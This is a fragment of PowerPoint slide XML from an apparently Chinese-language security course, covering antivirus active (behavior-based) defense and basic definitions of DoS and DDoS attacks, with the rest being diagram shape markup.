            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>主动防御技术</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="21507" name="Rectangle 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{DA8CE559-B40B-42E6-BB1E-228BB397B5C4}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>主动防御并不需要病毒特征码支持，只要杀毒软件能分析并扫描到目标程序的行为，并根据预先设定的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1">
                <a:effectLst>
                  <a:outerShdw blurRad="38100" dist="38100" dir="2700000" algn="tl">
                    <a:srgbClr val="C0C0C0"/>
                  </a:outerShdw>
                </a:effectLst>
              </a:rPr>
              <a:t>规则</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>，判定是否应该进行清除操作。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329778BB-F440-4440-A7A7-0F11B2CA715C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>主动防御技术：规则示例</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="180227" name="图片 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{61CE85CC-6926-4E87-9FFA-DCA485FFD7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5800" y="2205038"/>
            <a:ext cx="637540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55BD9C34-F44A-4689-8159-D1B88A1E73BE}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>主动防御技术</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="181251" name="Picture 5" descr="img200708151127420">
            <a:hlinkClick r:id="rId2"/>
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{CAA3B4D7-3822-4E75-94CA-4A1B8B5F1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2060575"/>
            <a:ext cx="690562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79295E34-D2B2-40AA-8194-DC28A63128E3}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>主动防御技术</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="182275" name="Rectangle 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{CF6A88FA-45ED-4C4A-9BEC-7F748902C01C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>主动防御本来想领先于病毒，让杀毒软件自己变成安全工程师来分析病毒，从而达到以不变应万变的境界。</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>卡巴斯基、火绒、微点主动防御软件</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a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{FE243230-D7C5-46A4-A835-19D9CF800D55}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>2.6 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>DOS / DDOS 攻击</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="103427" name="内容占位符 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F2208203-66D8-4AD1-A832-F177CED7E6F8}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buNone/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" dirty="0"/>
              <a:t>DoS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" dirty="0"/>
              <a:t>即</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" dirty="0"/>
              <a:t>Denial</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" dirty="0"/>
              <a:t>Of</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" dirty="0"/>
              <a:t>Service</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" dirty="0"/>
              <a:t>，拒绝服务的缩写</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFont typeface="Wingdings 2" charset="0"/>
              <a:buChar char=""/>
              <a:defRPr/>
            </a:pPr>
            <a:endParaRPr lang="zh-CN" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buNone/>
              <a:defRPr/>
            </a:pPr>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buNone/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" dirty="0"/>
              <a:t>DD</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>o</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" dirty="0"/>
              <a:t>S</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" dirty="0"/>
              <a:t>全名是</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" dirty="0"/>
              <a:t>Distributed Denial of service (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" dirty="0"/>
              <a:t>分布式拒绝服务</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" dirty="0"/>
              <a:t>)</a:t>
            </a:r>
            <a:endParaRPr lang="zh-C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4322" name="Group 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2DE15B92-91B2-4A11-9057-EDE561F2EF8B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr>
            <a:grpSpLocks/>
          </p:cNvGrpSpPr>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr bwMode="auto">
          <a:xfrm>
            <a:off x="152400" y="1219200"/>
            <a:ext cx="8991600" cy="5334000"/>
            <a:chOff x="0" y="0"/>
            <a:chExt cx="5664" cy="3360"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="184406" name="Picture 3" descr="ISP new Backbone">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F1187239-97D3-4452-8B20-943051A8D7B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566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7" name="Rectangle 4">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B3086B83-F829-4919-A281-5675A4809987}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="5169" y="2160"/>
              <a:ext cx="495" cy="354"/>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grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5125" name="Freeform 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2A2176AD-AD5F-431A-849F-475E5207573E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1981200" y="1676400"/>
            <a:ext cx="4648200" cy="2562225"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst>
              <a:gd name="T0" fmla="*/ 2147483646 w 2832"/>
              <a:gd name="T1" fmla="*/ 0 h 1566"/>
              <a:gd name="T2" fmla="*/ 2147483646 w 2832"/>
              <a:gd name="T3" fmla="*/ 2147483646 h 1566"/>
              <a:gd name="T4" fmla="*/ 2147483646 w 2832"/>
              <a:gd name="T5" fmla="*/ 2147483646 h 1566"/>
              <a:gd name="T6" fmla="*/ 0 w 2832"/>
              <a:gd name="T7" fmla="*/ 2147483646 h 1566"/>
              <a:gd name="T8" fmla="*/ 0 60000 65536"/>
              <a:gd name="T9" fmla="*/ 0 60000 65536"/>
              <a:gd name="T10" fmla="*/ 0 60000 65536"/>
              <a:gd name="T11" fmla="*/ 0 60000 65536"/>
              <a:gd name="T12" fmla="*/ 0 w 2832"/>
              <a:gd name="T13" fmla="*/ 0 h 1566"/>
              <a:gd name="T14" fmla="*/ 2832 w 2832"/>
              <a:gd name="T15" fmla="*/ 1566 h 1566"/>
            </a:gdLst>
            <a:ahLst/>
            <a:cxnLst>
              <a:cxn ang="T8">
                <a:pos x="T0" y="T1"/>
              </a:cxn>
              <a:cxn ang="T9">
                <a:pos x="T2" y="T3"/>
              </a:cxn>
              <a:cxn ang="T10">
                <a:pos x="T4" y="T5"/>
              </a:cxn>
              <a:cxn ang="T11">
                <a:pos x="T6" y="T7"/>
              </a:cxn>
            </a:cxnLst>
            <a:rect l="T12" t="T13" r="T14" b="T15"/>
            <a:pathLst>
              <a:path w="2832" h="1566">
                <a:moveTo>
                  <a:pt x="2832" y="0"/>
                </a:moveTo>
                <a:cubicBezTo>
                  <a:pt x="2542" y="232"/>
                  <a:pt x="1472" y="1224"/>
                  <a:pt x="1090" y="1395"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="708" y="1566"/>
                  <a:pt x="724" y="1239"/>
                  <a:pt x="542" y="1023"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="360" y="807"/>
                  <a:pt x="113" y="289"/>
                  <a:pt x="0" y="96"/>
                </a:cubicBezTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:noFill/>
          <a:ln w="63500" cap="rnd" cmpd="sng">
            <a:solidFill>
              <a:srgbClr val="FF0000"/>
            </a:solidFill>
            <a:prstDash val="sysDot"/>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 name="Freeform 6">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B0F70853-B476-4288-A54B-B58F732F53F1}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="995363" y="1900238"/>
            <a:ext cx="5791200" cy="3886200"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst>
              <a:gd name="T0" fmla="*/ 2147483646 w 3648"/>
              <a:gd name="T1" fmla="*/ 0 h 2448"/>
              <a:gd name="T2" fmla="*/ 0 w 3648"/>
              <a:gd name="T3" fmla="*/ 2147483646 h 2448"/>
              <a:gd name="T4" fmla="*/ 0 60000 65536"/>
              <a:gd name="T5" fmla="*/ 0 60000 65536"/>
              <a:gd name="T6" fmla="*/ 0 w 3648"/>
              <a:gd name="T7" fmla="*/ 0 h 2448"/>
              <a:gd name="T8" fmla="*/ 3648 w 3648"/>
              <a:gd name="T9" fmla="*/ 2448 h 2448"/>
            </a:gdLst>
            <a:ahLst/>
            <a:cxnLst>
              <a:cxn ang="T4">
                <a:pos x="T0" y="T1"/>
              </a:cxn>
              <a:cxn ang="T5">
                <a:pos x="T2" y="T3"/>
              </a:cxn>
            </a:cxnLst>
            <a:rect l="T6" t="T7" r="T8" b="T9"/>
            <a:pathLst>
              <a:path w="3648" h="2448">
                <a:moveTo>
                  <a:pt x="3648" y="0"/>
                </a:moveTo>
                <a:cubicBezTo>
                  <a:pt x="2128" y="1020"/>
                  <a:pt x="608" y="2040"/>
                  <a:pt x="0" y="2448"/>
                </a:cubicBezTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:noFill/>
          <a:ln w="63500" cap="rnd" cmpd="sng">
            <a:solidFill>
              <a:srgbClr val="FF0000"/>
            </a:solidFill>
            <a:prstDash val="sysDot"/>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25" name="Freeform 7">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{087AE893-4CD9-43B1-936F-67B6E14D018E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="5664200" y="1524000"/>
            <a:ext cx="812800" cy="1003300"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst>
              <a:gd name="T0" fmla="*/ 2147483646 w 512"/>
              <a:gd name="T1" fmla="*/ 0 h 632"/>
              <a:gd name="T2" fmla="*/ 2147483646 w 512"/>
              <a:gd name="T3" fmla="*/ 2147483646 h 632"/>
              <a:gd name="T4" fmla="*/ 2147483646 w 512"/>
              <a:gd name="T5" fmla="*/ 2147483646 h 632"/>
              <a:gd name="T6" fmla="*/ 0 60000 65536"/>
              <a:gd name="T7" fmla="*/ 0 60000 65536"/>
              <a:gd name="T8" fmla="*/ 0 60000 65536"/>
              <a:gd name="T9" fmla="*/ 0 w 512"/>
              <a:gd name="T10" fmla="*/ 0 h 632"/>
              <a:gd name="T11" fmla="*/ 512 w 512"/>
              <a:gd name="T12" fmla="*/ 632 h 632"/>
            </a:gdLst>
            <a:ahLst/>
            <a:cxnLst>
              <a:cxn ang="T6">
                <a:pos x="T0" y="T1"/>
              </a:cxn>
              <a:cxn ang="T7">
                <a:pos x="T2" y="T3"/>
              </a:cxn>
              <a:cxn ang="T8">
                <a:pos x="T4" y="T5"/>
              </a:cxn>
            </a:cxnLst>
            <a:rect l="T9" t="T10" r="T11" b="T12"/>
            <a:pathLst>
              <a:path w="512" h="632">
                <a:moveTo>
                  <a:pt x="512" y="0"/>
                </a:moveTo>
                <a:cubicBezTo>
                  <a:pt x="336" y="260"/>
                  <a:pt x="160" y="520"/>
                  <a:pt x="80" y="576"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="0" y="632"/>
                  <a:pt x="16" y="484"/>
                  <a:pt x="32" y="336"/>
                </a:cubicBezTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:noFill/>
          <a:ln w="63500" cap="rnd" cmpd="sng">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26" name="Freeform 8">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{BA2C179B-EF93-4C40-B9E8-42D60AA6A3F0}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="5854700" y="1828800"/>
            <a:ext cx="850900" cy="838200"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst>
              <a:gd name="T0" fmla="*/ 2147483646 w 536"/>
              <a:gd name="T1" fmla="*/ 0 h 528"/>
              <a:gd name="T2" fmla="*/ 2147483646 w 536"/>
              <a:gd name="T3" fmla="*/ 2147483646 h 528"/>
              <a:gd name="T4" fmla="*/ 2147483646 w 536"/>
              <a:gd name="T5" fmla="*/ 2147483646 h 528"/>
              <a:gd name="T6" fmla="*/ 0 60000 65536"/>
              <a:gd name="T7" fmla="*/ 0 60000 65536"/>
              <a:gd name="T8" fmla="*/ 0 60000 65536"/>
              <a:gd name="T9" fmla="*/ 0 w 536"/>
              <a:gd name="T10" fmla="*/ 0 h 528"/>
              <a:gd name="T11" fmla="*/ 536 w 536"/>
              <a:gd name="T12" fmla="*/ 528 h 528"/>
            </a:gdLst>
            <a:ahLst/>
            <a:cxnLst>
              <a:cxn ang="T6">
                <a:pos x="T0" y="T1"/>
              </a:cxn>
              <a:cxn ang="T7">
                <a:pos x="T2" y="T3"/>
              </a:cxn>
              <a:cxn ang="T8">
                <a:pos x="T4" y="T5"/>
              </a:cxn>
            </a:cxnLst>
            <a:rect l="T9" t="T10" r="T11" b="T12"/>
            <a:pathLst>
              <a:path w="536" h="528">
                <a:moveTo>
                  <a:pt x="536" y="0"/>
                </a:moveTo>
                <a:cubicBezTo>
                  <a:pt x="324" y="148"/>
                  <a:pt x="112" y="296"/>
                  <a:pt x="56" y="384"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="0" y="472"/>
                  <a:pt x="100" y="500"/>
                  <a:pt x="200" y="528"/>
                </a:cubicBezTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:noFill/>
          <a:ln w="63500" cap="rnd" cmpd="sng">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129" name="Picture 9" descr="j0151489">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F97FD80C-6320-474C-AE2E-378013231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990600"/>
            <a:ext cx="979487"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28" name="Group 10">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{323A8DB5-D74D-4F07-BABE-178312EC0B4B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr>
            <a:grpSpLocks/>
          </p:cNvGrpSpPr>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr bwMode="auto">
          <a:xfrm>
            <a:off x="3146425" y="5287963"/>
            <a:ext cx="441325" cy="701675"/>
            <a:chOff x="0" y="0"/>
            <a:chExt cx="278" cy="442"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="184396" name="Freeform 11">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0B2E7192-5649-4F40-8429-E8B13067EF8A}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="0" y="66"/>
              <a:ext cx="192" cy="376"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 192 w 192"/>
                <a:gd name="T1" fmla="*/ 37 h 376"/>
                <a:gd name="T2" fmla="*/ 0 w 192"/>
                <a:gd name="T3" fmla="*/ 0 h 376"/>
                <a:gd name="T4" fmla="*/ 0 w 192"/>
                <a:gd name="T5" fmla="*/ 340 h 376"/>
                <a:gd name="T6" fmla="*/ 192 w 192"/>
                <a:gd name="T7" fmla="*/ 376 h 376"/>
                <a:gd name="T8" fmla="*/ 192 w 192"/>
                <a:gd name="T9" fmla="*/ 37 h 376"/>
                <a:gd name="T10" fmla="*/ 192 w 192"/>
                <a:gd name="T11" fmla="*/ 37 h 376"/>
                <a:gd name="T12" fmla="*/ 0 60000 65536"/>
                <a:gd name="T13" fmla="*/ 0 60000 65536"/>
                <a:gd name="T14" fmla="*/ 0 60000 65536"/>
                <a:gd name="T15" fmla="*/ 0 60000 65536"/>
                <a:gd name="T16" fmla="*/ 0 60000 65536"/>
                <a:gd name="T17" fmla="*/ 0 60000 65536"/>
                <a:gd name="T18" fmla="*/ 0 w 192"/>
                <a:gd name="T19" fmla="*/ 0 h 376"/>
                <a:gd name="T20" fmla="*/ 192 w 192"/>
                <a:gd name="T21" fmla="*/ 376 h 376"/>
              </a:gdLst>
              <a:ahLst/>
              <a:cxnLst>
                <a:cxn ang="T12">
                  <a:pos x="T0" y="T1"/>
                </a:cxn>
                <a:cxn ang="T13">
                  <a:pos x="T2" y="T3"/>
                </a:cxn>
                <a:cxn ang="T14">
                  <a:pos x="T4" y="T5"/>
                </a:cxn>
                <a:cxn ang="T15">
                  <a:pos x="T6" y="T7"/>
                </a:cxn>
                <a:cxn ang="T16">
                  <a:pos x="T8" y="T9"/>
                </a:cxn>
                <a:cxn ang="T17">
                  <a:pos x="T10" y="T11"/>
                </a:cxn>
              </a:cxnLst>
              <a:rect l="T18" t="T19" r="T20" b="T21"/>
              <a:pathLst>
                <a:path w="192" h="376">
                  <a:moveTo>
                    <a:pt x="192" y="37"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="0" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="340"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="192" y="376"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="192" y="37"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
              </a:pathLst>
            </a:custGeom>
            <a:solidFill>
              <a:srgbClr val="6A9A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97" name="Freeform 12">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0A8EEC84-DEED-4F03-83A8-74494DD80F3B}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="192" y="37"/>
              <a:ext cx="86" cy="405"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 0 w 86"/>
                <a:gd name="T1" fmla="*/ 66 h 405"/>
                <a:gd name="T2" fmla="*/ 86 w 86"/>
                <a:gd name="T3" fmla="*/ 0 h 405"/>
                <a:gd name="T4" fmla="*/ 86 w 86"/>
                <a:gd name="T5" fmla="*/ 340 h 405"/>
                <a:gd name="T6" fmla="*/ 0 w 86"/>
                <a:gd name="T7" fmla="*/ 405 h 405"/>
                <a:gd name="T8" fmla="*/ 0 w 86"/>
                <a:gd name="T9" fmla="*/ 66 h 405"/>
                <a:gd name="T10" fmla="*/ 0 w 86"/>
                <a:gd name="T11" fmla="*/ 66 h 405"/>
                <a:gd name="T12" fmla="*/ 0 60000 65536"/>
                <a:gd name="T13" fmla="*/ 0 60000 65536"/>
                <a:gd name="T14" fmla="*/ 0 60000 65536"/>
                <a:gd name="T15" fmla="*/ 0 60000 65536"/>
                <a:gd name="T16" fmla="*/ 0 60000 65536"/>
                <a:gd name="T17" fmla="*/ 0 60000 65536"/>
                <a:gd name="T18" fmla="*/ 0 w 86"/>
                <a:gd name="T19" fmla="*/ 0 h 405"/>
                <a:gd name="T20" fmla="*/ 86 w 86"/>
                <a:gd name="T21" fmla="*/ 405 h 405"/>
              </a:gdLst>
              <a:ahLst/>
              <a:cxnLst>
                <a:cxn ang="T12">
                  <a:pos x="T0" y="T1"/>
                </a:cxn>
                <a:cxn ang="T13">
                  <a:pos x="T2" y="T3"/>
                </a:cxn>
                <a:cxn ang="T14">
                  <a:pos x="T4" y="T5"/>
                </a:cxn>
                <a:cxn ang="T15">
                  <a:pos x="T6" y="T7"/>
                </a:cxn>
                <a:cxn ang="T16">
                  <a:pos x="T8" y="T9"/>
                </a:cxn>
                <a:cxn ang="T17">
                  <a:pos x="T10" y="T11"/>
                </a:cxn>
              </a:cxnLst>
              <a:rect l="T18" t="T19" r="T20" b="T21"/>
              <a:pathLst>
                <a:path w="86" h="405">
                  <a:moveTo>
                    <a:pt x="0" y="66"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="86" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="86" y="340"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="405"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="66"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
              </a:pathLst>
            </a:custGeom>
            <a:solidFill>
              <a:srgbClr val="ADC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98" name="Freeform 13">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F81BDB87-B7B1-4A5A-8A19-7AEBE53C6EA5}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="0" y="0"/>
              <a:ext cx="278" cy="103"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 192 w 278"/>
